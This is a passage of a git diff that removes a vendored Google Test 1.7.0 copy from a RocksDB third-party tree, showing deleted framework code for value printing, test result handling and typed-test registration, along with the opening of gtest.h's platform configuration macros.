-// Reads and returns the string environment variable corresponding to
-// the given flag; if it's not set, returns default_value.
-const char* StringFromGTestEnv(const char* flag, const char* default_value) {
-  const std::string env_var = FlagToEnvVar(flag);
-  const char* const value = posix::GetEnv(env_var.c_str());
-  return value == NULL ? default_value : value;
-}
-
-}  // namespace internal
-}  // namespace testing
-// Copyright 2007, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-// Google Test - The Google C++ Testing Framework
-//
-// This file implements a universal value printer that can print a
-// value of any type T:
-//
-//   void ::testing::internal::UniversalPrinter<T>::Print(value, ostream_ptr);
-//
-// It uses the << operator when possible, and prints the bytes in the
-// object otherwise.  A user can override its behavior for a class
-// type Foo by defining either operator<<(::std::ostream&, const Foo&)
-// or void PrintTo(const Foo&, ::std::ostream*) in the namespace that
-// defines Foo.
-
-#include <ctype.h>
-#include <stdio.h>
-#include <cwchar>
-#include <ostream>  // NOLINT
-#include <string>
-
-namespace testing {
-
-namespace {
-
-using ::std::ostream;
-
-// Prints a segment of bytes in the given object.
-GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_
-GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_
-void PrintByteSegmentInObjectTo(const unsigned char* obj_bytes, size_t start,
-                                size_t count, ostream* os) {
-  char text[5] = "";
-  for (size_t i = 0; i != count; i++) {
-    const size_t j = start + i;
-    if (i != 0) {
-      // Organizes the bytes into groups of 2 for easy parsing by
-      // human.
-      if ((j % 2) == 0)
-        *os << ' ';
-      else
-        *os << '-';
-    }
-    GTEST_SNPRINTF_(text, sizeof(text), "%02X", obj_bytes[j]);
-    *os << text;
-  }
-}
-
-// Prints the bytes in the given value to the given ostream.
-void PrintBytesInObjectToImpl(const unsigned char* obj_bytes, size_t count,
-                              ostream* os) {
-  // Tells the user how big the object is.
-  *os << count << "-byte object <";
-
-  const size_t kThreshold = 132;
-  const size_t kChunkSize = 64;
-  // If the object size is bigger than kThreshold, we'll have to omit
-  // some details by printing only the first and the last kChunkSize
-  // bytes.
-  // TODO(wan): let the user control the threshold using a flag.
-  if (count < kThreshold) {
-    PrintByteSegmentInObjectTo(obj_bytes, 0, count, os);
-  } else {
-    PrintByteSegmentInObjectTo(obj_bytes, 0, kChunkSize, os);
-    *os << " ... ";
-    // Rounds up to 2-byte boundary.
-    const size_t resume_pos = (count - kChunkSize + 1)/2*2;
-    PrintByteSegmentInObjectTo(obj_bytes, resume_pos, count - resume_pos, os);
-  }
-  *os << ">";
-}
-
-}  // namespace
-
-namespace internal2 {
-
-// Delegates to PrintBytesInObjectToImpl() to print the bytes in the
-// given object.  The delegation simplifies the implementation, which
-// uses the << operator and thus is easier done outside of the
-// ::testing::internal namespace, which contains a << operator that
-// sometimes conflicts with the one in STL.
-void PrintBytesInObjectTo(const unsigned char* obj_bytes, size_t count,
-                          ostream* os) {
-  PrintBytesInObjectToImpl(obj_bytes, count, os);
-}
-
-}  // namespace internal2
-
-namespace internal {
-
-// Depending on the value of a char (or wchar_t), we print it in one
-// of three formats:
-//   - as is if it's a printable ASCII (e.g. 'a', '2', ' '),
-//   - as a hexidecimal escape sequence (e.g. '\x7F'), or
-//   - as a special escape sequence (e.g. '\r', '\n').
-enum CharFormat {
-  kAsIs,
-  kHexEscape,
-  kSpecialEscape
-};
-
-// Returns true if c is a printable ASCII character.  We test the
-// value of c directly instead of calling isprint(), which is buggy on
-// Windows Mobile.
-inline bool IsPrintableAscii(wchar_t c) {
-  return 0x20 <= c && c <= 0x7E;
-}
-
-// Prints a wide or narrow char c as a character literal without the
-// quotes, escaping it when necessary; returns how c was formatted.
-// The template argument UnsignedChar is the unsigned version of Char,
-// which is the type of c.
-template <typename UnsignedChar, typename Char>
-static CharFormat PrintAsCharLiteralTo(Char c, ostream* os) {
-  switch (static_cast<wchar_t>(c)) {
-    case L'\0':
-      *os << "\\0";
-      break;
-    case L'\'':
-      *os << "\\'";
-      break;
-    case L'\\':
-      *os << "\\\\";
-      break;
-    case L'\a':
-      *os << "\\a";
-      break;
-    case L'\b':
-      *os << "\\b";
-      break;
-    case L'\f':
-      *os << "\\f";
-      break;
-    case L'\n':
-      *os << "\\n";
-      break;
-    case L'\r':
-      *os << "\\r";
-      break;
-    case L'\t':
-      *os << "\\t";
-      break;
-    case L'\v':
-      *os << "\\v";
-      break;
-    default:
-      if (IsPrintableAscii(c)) {
-        *os << static_cast<char>(c);
-        return kAsIs;
-      } else {
-        *os << "\\x" + String::FormatHexInt(static_cast<UnsignedChar>(c));
-        return kHexEscape;
-      }
-  }
-  return kSpecialEscape;
-}
-
-// Prints a wchar_t c as if it's part of a string literal, escaping it when
-// necessary; returns how c was formatted.
-static CharFormat PrintAsStringLiteralTo(wchar_t c, ostream* os) {
-  switch (c) {
-    case L'\'':
-      *os << "'";
-      return kAsIs;
-    case L'"':
-      *os << "\\\"";
-      return kSpecialEscape;
-    default:
-      return PrintAsCharLiteralTo<wchar_t>(c, os);
-  }
-}
-
-// Prints a char c as if it's part of a string literal, escaping it when
-// necessary; returns how c was formatted.
-static CharFormat PrintAsStringLiteralTo(char c, ostream* os) {
-  return PrintAsStringLiteralTo(
-      static_cast<wchar_t>(static_cast<unsigned char>(c)), os);
-}
-
-// Prints a wide or narrow character c and its code.  '\0' is printed
-// as "'\\0'", other unprintable characters are also properly escaped
-// using the standard C++ escape sequence.  The template argument
-// UnsignedChar is the unsigned version of Char, which is the type of c.
-template <typename UnsignedChar, typename Char>
-void PrintCharAndCodeTo(Char c, ostream* os) {
-  // First, print c as a literal in the most readable form we can find.
-  *os << ((sizeof(c) > 1) ? "L'" : "'");
-  const CharFormat format = PrintAsCharLiteralTo<UnsignedChar>(c, os);
-  *os << "'";
-
-  // To aid user debugging, we also print c's code in decimal, unless
-  // it's 0 (in which case c was printed as '\\0', making the code
-  // obvious).
-  if (c == 0)
-    return;
-  *os << " (" << static_cast<int>(c);
-
-  // For more convenience, we print c's code again in hexidecimal,
-  // unless c was already printed in the form '\x##' or the code is in
-  // [1, 9].
-  if (format == kHexEscape || (1 <= c && c <= 9)) {
-    // Do nothing.
-  } else {
-    *os << ", 0x" << String::FormatHexInt(static_cast<UnsignedChar>(c));
-  }
-  *os << ")";
-}
-
-void PrintTo(unsigned char c, ::std::ostream* os) {
-  PrintCharAndCodeTo<unsigned char>(c, os);
-}
-void PrintTo(signed char c, ::std::ostream* os) {
-  PrintCharAndCodeTo<unsigned char>(c, os);
-}
-
-// Prints a wchar_t as a symbol if it is printable or as its internal
-// code otherwise and also as its code.  L'\0' is printed as "L'\\0'".
-void PrintTo(wchar_t wc, ostream* os) {
-  PrintCharAndCodeTo<wchar_t>(wc, os);
-}
-
-// Prints the given array of characters to the ostream.  CharType must be either
-// char or wchar_t.
-// The array starts at begin, the length is len, it may include '\0' characters
-// and may not be NUL-terminated.
-template <typename CharType>
-GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_
-GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_
-static void PrintCharsAsStringTo(
-    const CharType* begin, size_t len, ostream* os) {
-  const char* const kQuoteBegin = sizeof(CharType) == 1 ? "\"" : "L\"";
-  *os << kQuoteBegin;
-  bool is_previous_hex = false;
-  for (size_t index = 0; index < len; ++index) {
-    const CharType cur = begin[index];
-    if (is_previous_hex && IsXDigit(cur)) {
-      // Previous character is of '\x..' form and this character can be
-      // interpreted as another hexadecimal digit in its number. Break string to
-      // disambiguate.
-      *os << "\" " << kQuoteBegin;
-    }
-    is_previous_hex = PrintAsStringLiteralTo(cur, os) == kHexEscape;
-  }
-  *os << "\"";
-}
-
-// Prints a (const) char/wchar_t array of 'len' elements, starting at address
-// 'begin'.  CharType must be either char or wchar_t.
-template <typename CharType>
-GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_
-GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_
-static void UniversalPrintCharArray(
-    const CharType* begin, size_t len, ostream* os) {
-  // The code
-  //   const char kFoo[] = "foo";
-  // generates an array of 4, not 3, elements, with the last one being '\0'.
-  //
-  // Therefore when printing a char array, we don't print the last element if
-  // it's '\0', such that the output matches the string literal as it's
-  // written in the source code.
-  if (len > 0 && begin[len - 1] == '\0') {
-    PrintCharsAsStringTo(begin, len - 1, os);
-    return;
-  }
-
-  // If, however, the last element in the array is not '\0', e.g.
-  //    const char kFoo[] = { 'f', 'o', 'o' };
-  // we must print the entire array.  We also print a message to indicate
-  // that the array is not NUL-terminated.
-  PrintCharsAsStringTo(begin, len, os);
-  *os << " (no terminating NUL)";
-}
-
-// Prints a (const) char array of 'len' elements, starting at address 'begin'.
-void UniversalPrintArray(const char* begin, size_t len, ostream* os) {
-  UniversalPrintCharArray(begin, len, os);
-}
-
-// Prints a (const) wchar_t array of 'len' elements, starting at address
-// 'begin'.
-void UniversalPrintArray(const wchar_t* begin, size_t len, ostream* os) {
-  UniversalPrintCharArray(begin, len, os);
-}
-
-// Prints the given C string to the ostream.
-void PrintTo(const char* s, ostream* os) {
-  if (s == NULL) {
-    *os << "NULL";
-  } else {
-    *os << ImplicitCast_<const void*>(s) << " pointing to ";
-    PrintCharsAsStringTo(s, strlen(s), os);
-  }
-}
-
-// MSVC compiler can be configured to define whar_t as a typedef
-// of unsigned short. Defining an overload for const wchar_t* in that case
-// would cause pointers to unsigned shorts be printed as wide strings,
-// possibly accessing more memory than intended and causing invalid
-// memory accesses. MSVC defines _NATIVE_WCHAR_T_DEFINED symbol when
-// wchar_t is implemented as a native type.
-#if !defined(_MSC_VER) || defined(_NATIVE_WCHAR_T_DEFINED)
-// Prints the given wide C string to the ostream.
-void PrintTo(const wchar_t* s, ostream* os) {
-  if (s == NULL) {
-    *os << "NULL";
-  } else {
-    *os << ImplicitCast_<const void*>(s) << " pointing to ";
-    PrintCharsAsStringTo(s, std::wcslen(s), os);
-  }
-}
-#endif  // wchar_t is native
-
-// Prints a ::string object.
-#if GTEST_HAS_GLOBAL_STRING
-void PrintStringTo(const ::string& s, ostream* os) {
-  PrintCharsAsStringTo(s.data(), s.size(), os);
-}
-#endif  // GTEST_HAS_GLOBAL_STRING
-
-void PrintStringTo(const ::std::string& s, ostream* os) {
-  PrintCharsAsStringTo(s.data(), s.size(), os);
-}
-
-// Prints a ::wstring object.
-#if GTEST_HAS_GLOBAL_WSTRING
-void PrintWideStringTo(const ::wstring& s, ostream* os) {
-  PrintCharsAsStringTo(s.data(), s.size(), os);
-}
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-#if GTEST_HAS_STD_WSTRING
-void PrintWideStringTo(const ::std::wstring& s, ostream* os) {
-  PrintCharsAsStringTo(s.data(), s.size(), os);
-}
-#endif  // GTEST_HAS_STD_WSTRING
-
-}  // namespace internal
-
-}  // namespace testing
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: mheule@google.com (Markus Heule)
-//
-// The Google C++ Testing Framework (Google Test)
-
-
-// Indicates that this translation unit is part of Google Test's
-// implementation.  It must come before gtest-internal-inl.h is
-// included, or there will be a compiler error.  This trick exists to
-// prevent the accidental inclusion of gtest-internal-inl.h in the
-// user's code.
-#define GTEST_IMPLEMENTATION_ 1
-#undef GTEST_IMPLEMENTATION_
-
-namespace testing {
-
-using internal::GetUnitTestImpl;
-
-// Gets the summary of the failure message by omitting the stack trace
-// in it.
-std::string TestPartResult::ExtractSummary(const char* message) {
-  const char* const stack_trace = strstr(message, internal::kStackTraceMarker);
-  return stack_trace == NULL ? message :
-      std::string(message, stack_trace);
-}
-
-// Prints a TestPartResult object.
-std::ostream& operator<<(std::ostream& os, const TestPartResult& result) {
-  return os
-      << result.file_name() << ":" << result.line_number() << ": "
-      << (result.type() == TestPartResult::kSuccess ? "Success" :
-          result.type() == TestPartResult::kFatalFailure ? "Fatal failure" :
-          "Non-fatal failure") << ":\n"
-      << result.message() << std::endl;
-}
-
-// Appends a TestPartResult to the array.
-void TestPartResultArray::Append(const TestPartResult& result) {
-  array_.push_back(result);
-}
-
-// Returns the TestPartResult at the given index (0-based).
-const TestPartResult& TestPartResultArray::GetTestPartResult(int index) const {
-  if (index < 0 || index >= size()) {
-    printf("\nInvalid index (%d) into TestPartResultArray.\n", index);
-    internal::posix::Abort();
-  }
-
-  return array_[index];
-}
-
-// Returns the number of TestPartResult objects in the array.
-int TestPartResultArray::size() const {
-  return static_cast<int>(array_.size());
-}
-
-namespace internal {
-
-HasNewFatalFailureHelper::HasNewFatalFailureHelper()
-    : has_new_fatal_failure_(false),
-      original_reporter_(GetUnitTestImpl()->
-                         GetTestPartResultReporterForCurrentThread()) {
-  GetUnitTestImpl()->SetTestPartResultReporterForCurrentThread(this);
-}
-
-HasNewFatalFailureHelper::~HasNewFatalFailureHelper() {
-  GetUnitTestImpl()->SetTestPartResultReporterForCurrentThread(
-      original_reporter_);
-}
-
-void HasNewFatalFailureHelper::ReportTestPartResult(
-    const TestPartResult& result) {
-  if (result.fatally_failed())
-    has_new_fatal_failure_ = true;
-  original_reporter_->ReportTestPartResult(result);
-}
-
-}  // namespace internal
-
-}  // namespace testing
-// Copyright 2008 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-
-namespace testing {
-namespace internal {
-
-#if GTEST_HAS_TYPED_TEST_P
-
-// Skips to the first non-space char in str. Returns an empty string if str
-// contains only whitespace characters.
-static const char* SkipSpaces(const char* str) {
-  while (IsSpace(*str))
-    str++;
-  return str;
-}
-
-static std::vector<std::string> SplitIntoTestNames(const char* src) {
-  std::vector<std::string> name_vec;
-  src = SkipSpaces(src);
-  for (; src != NULL; src = SkipComma(src)) {
-    name_vec.push_back(StripTrailingSpaces(GetPrefixUntilComma(src)));
-  }
-  return name_vec;
-}
-
-// Verifies that registered_tests match the test names in
-// defined_test_names_; returns registered_tests if successful, or
-// aborts the program otherwise.
-const char* TypedTestCasePState::VerifyRegisteredTestNames(
-    const char* file, int line, const char* registered_tests) {
-  typedef ::std::set<const char*>::const_iterator DefinedTestIter;
-  registered_ = true;
-
-  std::vector<std::string> name_vec = SplitIntoTestNames(registered_tests);
-
-  Message errors;
-
-  std::set<std::string> tests;
-  for (std::vector<std::string>::const_iterator name_it = name_vec.begin();
-       name_it != name_vec.end(); ++name_it) {
-    const std::string& name = *name_it;
-    if (tests.count(name) != 0) {
-      errors << "Test " << name << " is listed more than once.\n";
-      continue;
-    }
-
-    bool found = false;
-    for (DefinedTestIter it = defined_test_names_.begin();
-         it != defined_test_names_.end();
-         ++it) {
-      if (name == *it) {
-        found = true;
-        break;
-      }
-    }
-
-    if (found) {
-      tests.insert(name);
-    } else {
-      errors << "No test named " << name
-             << " can be found in this test case.\n";
-    }
-  }
-
-  for (DefinedTestIter it = defined_test_names_.begin();
-       it != defined_test_names_.end();
-       ++it) {
-    if (tests.count(*it) == 0) {
-      errors << "You forgot to list test " << *it << ".\n";
-    }
-  }
-
-  const std::string& errors_str = errors.GetString();
-  if (errors_str != "") {
-    fprintf(stderr, "%s %s", FormatFileLocation(file, line).c_str(),
-            errors_str.c_str());
-    fflush(stderr);
-    posix::Abort();
-  }
-
-  return registered_tests;
-}
-
-#endif  // GTEST_HAS_TYPED_TEST_P
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // __clang_analyzer__
diff --git a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest.h b/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest.h
deleted file mode 100644
index e3f0cfb..0000000
--- a/thirdparty/rocksdb/third-party/gtest-1.7.0/fused-src/gtest/gtest.h
+++ /dev/null
@@ -1,20725 +0,0 @@
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-//
-// The Google C++ Testing Framework (Google Test)
-//
-// This header file defines the public API for Google Test.  It should be
-// included by any test program that uses Google Test.
-//
-// IMPORTANT NOTE: Due to limitation of the C++ language, we have to
-// leave some internal implementation details in this header file.
-// They are clearly marked by comments like this:
-//
-//   // INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-//
-// Such code is NOT meant to be used by a user directly, and is subject
-// to CHANGE WITHOUT NOTICE.  Therefore DO NOT DEPEND ON IT in a user
-// program!
-//
-// Acknowledgment: Google Test borrowed the idea of automatic test
-// registration from Barthelemy Dagenais' (barthelemy@prologique.com)
-// easyUnit framework.
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_H_
-#define GTEST_INCLUDE_GTEST_GTEST_H_
-
-#include <limits>
-#include <ostream>
-#include <vector>
-
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: wan@google.com (Zhanyong Wan), eefacm@gmail.com (Sean Mcafee)
-//
-// The Google C++ Testing Framework (Google Test)
-//
-// This header file declares functions and macros used internally by
-// Google Test.  They are subject to change without notice.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_INTERNAL_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_INTERNAL_H_
-
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: wan@google.com (Zhanyong Wan)
-//
-// Low-level types and utilities for porting Google Test to various
-// platforms.  All macros ending with _ and symbols defined in an
-// internal namespace are subject to change without notice.  Code
-// outside Google Test MUST NOT USE THEM DIRECTLY.  Macros that don't
-// end with _ are part of Google Test's public API and can be used by
-// code outside Google Test.
-//
-// This file is fundamental to Google Test.  All other Google Test source
-// files are expected to #include this.  Therefore, it cannot #include
-// any other Google Test header.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PORT_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PORT_H_
-
-// Environment-describing macros
-// -----------------------------
-//
-// Google Test can be used in many different environments.  Macros in
-// this section tell Google Test what kind of environment it is being
-// used in, such that Google Test can provide environment-specific
-// features and implementations.
-//
-// Google Test tries to automatically detect the properties of its
-// environment, so users usually don't need to worry about these
-// macros.  However, the automatic detection is not perfect.
-// Sometimes it's necessary for a user to define some of the following
-// macros in the build script to override Google Test's decisions.
-//
-// If the user doesn't define a macro in the list, Google Test will
-// provide a default definition.  After this header is #included, all
-// macros in this list will be defined to either 1 or 0.
-//
-// Notes to maintainers:
-//   - Each macro here is a user-tweakable knob; do not grow the list
-//     lightly.
-//   - Use #if to key off these macros.  Don't use #ifdef or "#if
-//     defined(...)", which will not work as these macros are ALWAYS
-//     defined.
-//
-//   GTEST_HAS_CLONE          - Define it to 1/0 to indicate that clone(2)
-//                              is/isn't available.
-//   GTEST_HAS_EXCEPTIONS     - Define it to 1/0 to indicate that exceptions
-//                              are enabled.
-//   GTEST_HAS_GLOBAL_STRING  - Define it to 1/0 to indicate that ::string
-//                              is/isn't available (some systems define
-//                              ::string, which is different to std::string).
-//   GTEST_HAS_GLOBAL_WSTRING - Define it to 1/0 to indicate that ::string
-//                              is/isn't available (some systems define
-//                              ::wstring, which is different to std::wstring).
-//   GTEST_HAS_POSIX_RE       - Define it to 1/0 to indicate that POSIX regular
-//                              expressions are/aren't available.
-//   GTEST_HAS_PTHREAD        - Define it to 1/0 to indicate that <pthread.h>
-//                              is/isn't available.
-//   GTEST_HAS_RTTI           - Define it to 1/0 to indicate that RTTI is/isn't
-//                              enabled.
-//   GTEST_HAS_STD_WSTRING    - Define it to 1/0 to indicate that
-//                              std::wstring does/doesn't work (Google Test can
-//                              be used where std::wstring is unavailable).
-//   GTEST_HAS_TR1_TUPLE      - Define it to 1/0 to indicate tr1::tuple
-//                              is/isn't available.
-//   GTEST_HAS_SEH            - Define it to 1/0 to indicate whether the
-//                              compiler supports Microsoft's "Structured
-//                              Exception Handling".
-//   GTEST_HAS_STREAM_REDIRECTION
-//                            - Define it to 1/0 to indicate whether the
-//                              platform supports I/O stream redirection using
-//                              dup() and dup2().
-//   GTEST_USE_OWN_TR1_TUPLE  - Define it to 1/0 to indicate whether Google
-//                              Test's own tr1 tuple implementation should be
-//                              used.  Unused when the user sets
-//                              GTEST_HAS_TR1_TUPLE to 0.
-//   GTEST_LANG_CXX11         - Define it to 1/0 to indicate that Google Test
-//                              is building in C++11/C++98 mode.
-//   GTEST_LINKED_AS_SHARED_LIBRARY
-//                            - Define to 1 when compiling tests that use
-//                              Google Test as a shared library (known as
-//                              DLL on Windows).
